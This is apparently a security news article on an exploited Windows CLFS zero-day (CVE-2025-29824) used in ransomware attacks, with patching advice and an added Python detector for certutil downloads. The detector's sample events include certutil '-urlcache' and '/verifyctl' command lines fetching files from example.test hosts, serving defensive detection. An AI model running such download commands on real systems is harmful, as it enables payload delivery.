Of the 134 Windows security flaws fixed by Microsoft in yesterday’s Patch Tuesday updates, only one was a zero-day flaw that could be exploited by hackers aiming to obtain higher system permissions.
Today, however, Microsoft has stated that this issue (tracked as CVE-2025-29824) has actually been exploited as a zero-day in specific ransomware attacks.
Now that it has been addressed with a patch, it is crucial for Windows users to promptly download and install this update to safeguard their systems. Although the attacks targeted only a few international entities such as IT and real estate companies in the U.S., banks in Venezuela, a software firm in Spain, and retailers in Saudi Arabia, all unpatched systems remain susceptible.
This vulnerability is a privilege elevation issue within the Windows Common Log File System that could allow an attacker to gain SYSTEM-level access when exploited. The Hacker News notes that hackers particularly prize such vulnerabilities because they allow for broad exploitation with elevated privileges and can also be used to install ransomware on susceptible personal computers.
The attackers have used a piece of malware called PipeMagic to deploy both exploits and ransomware payloads; this marks the second time a Windows zero-day vulnerability has been delivered through this malware. The first was tracked as CVE-2025-24983. It was also a privilege escalation issue, specifically affecting the Win32 Kernel Subsystem. That vulnerability was identified by ESET and patched by Microsoft last month.
Although the methods for obtaining initial access during these attacks remain unclear, evidence suggests that the attackers used the certutil tool to fetch malware from a tainted third-party website serving as a staging area for deploying payloads. Microsoft has identified and is monitoring this ongoing malicious activity and the subsequent exploitation of the vulnerability, and refers to it internally as Storm-2460.
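The certutil download behaviour described above can be hunted for in process-creation logs. The following is an added example, not code from Microsoft or the original article: it flags events where certutil is run with a URL-fetching switch, assuming events shaped like Sysmon Event ID 1 records; the hosts, paths and example.test URLs are constructed sample data.

```python
import re

# certutil verbs that fetch a remote URL; both "-" and "/" switch prefixes are accepted.
DOWNLOAD_VERBS = {"urlcache", "verifyctl"}
URL_RE = re.compile(r"(?:https?|ftp)://[^\s]+")
SWITCH_RE = re.compile(r"(?:^|\s)[-/]([a-z]+)")

def normalize(cmdline):
    """Lower-case and drop quotes so quoted arguments and switches compare cleanly."""
    return cmdline.replace('"', "").lower()

def is_certutil(event):
    """Match the image name or the PE OriginalFileName, which survives a renamed copy."""
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    return "certutil.exe" in (image, event.get("OriginalFileName", "").lower())

def certutil_download(event):
    """Return a finding if this event is certutil retrieving a remote URL, else None."""
    if not is_certutil(event):
        return None
    cmd = normalize(event.get("CommandLine", ""))
    verbs = sorted(set(SWITCH_RE.findall(cmd)) & DOWNLOAD_VERBS)
    urls = URL_RE.findall(cmd)
    if verbs and urls:
        return {"host": event["Computer"], "verbs": verbs, "urls": urls}
    return None

def scan(events):
    """Return the findings for every matching event, in input order."""
    return [f for f in map(certutil_download, events) if f]

# Constructed process-creation events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://files.example.test/a.dat C:\Users\Public\a.dat"},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -hashfile C:\Temp\setup.exe SHA256"},
    {"Computer": "WS03", "Image": r"C:\Users\Public\cu.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": 'cu.exe /verifyctl -f "https://cdn.example.test/p.bin"'},
    {"Computer": "WS04", "Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe", "CommandLine": "curl.exe -O http://files.example.test/a.dat"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Routine certutil use such as hashing a file (WS02) is not flagged, and other download tools (WS04) are outside the scope of this check.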
Ways to protect yourself against malware and ransomware

Patch Tuesday occurs on the second Tuesday of each month, so schedule a calendar alert to remind yourself to update your computer during this period. Failing to keep your software updated provides an easy entry point for cyber attackers and malicious entities, so avoid leaving yourself vulnerable by overlooking essential updates. Additionally, consider setting up automatic updates and regular scan schedules for your security programs, as these measures are crucial components of safeguarding your system. You should also have one of the best antivirus programs installed on your computer.
Since Windows Defender is integrated into Windows, you can also use it to routinely scan your system for malware or viruses. Additionally, make sure to follow secure browsing practices online. Check whether your antivirus security suite includes a fortified browser or a VPN for an additional layer of security. However, always avoid clicking on links, attachments, or downloads from unrecognized senders or unfamiliar sources. Download applications and software exclusively from reputable app stores and verified developers, and learn to identify typical phishing techniques.
Zero-day vulnerabilities offer a straightforward path for hackers and cyber criminals to initiate their assaults, which explains why information about these weaknesses commands a steep price. However, the primary defense against attacks leveraging zero-days remains promptly installing security patches once they’re released and maintaining robust online cybersecurity practices.